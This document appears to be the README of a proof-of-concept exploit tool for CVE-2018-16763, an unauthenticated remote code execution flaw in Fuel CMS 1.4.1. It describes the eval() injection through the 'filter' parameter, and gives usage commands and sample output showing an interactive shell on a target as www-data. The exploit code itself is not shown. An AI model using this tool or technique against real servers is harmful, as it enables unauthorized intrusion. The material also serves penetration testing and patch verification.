## https://sploitus.com/exploit?id=F33CF218-7FA5-5951-8E1C-17ADAC30E676
# CVE-2018-16763 — Fuel CMS 1.4.1 Remote Code Execution (PoC)
> Unauthenticated RCE vulnerability in Fuel CMS 1.4.1. The `filter` parameter in the `/fuel/pages/select/` endpoint is passed unsanitized to a `eval()` call in the PHP backend, allowing arbitrary code execution via a crafted payload. Unlike blind injections, the output **is reflected** directly in the HTTP response, so no intermediate file is needed.
---
## How it works
1. Sends a GET request to `/fuel/pages/select/` with a specially crafted `filter` payload that calls PHP's `system()` with the desired command.
2. Parses the reflected output from the HTTP response using a regex pattern.
3. Returns the command output directly to the interactive shell.
## Requirements
- Python 3
- Install dependencies:
```bash
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
```
## Usage
```bash
python3 exploit.py -t http://TARGET
```
**Example:**
```
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
Shell> hostname
fuel-cms
Shell> exit
```
## References
- [CVE-2018-16763](https://nvd.nist.gov/vuln/detail/CVE-2018-16763)
- [EDB-47138](https://www.exploit-db.com/exploits/47138)
## Credits
- **Discovery & original exploit:** Syed Sheeraz Ali
- **Cleanup & interactive shell:** [Esteban Zárate](https://github.com/estebanzarate)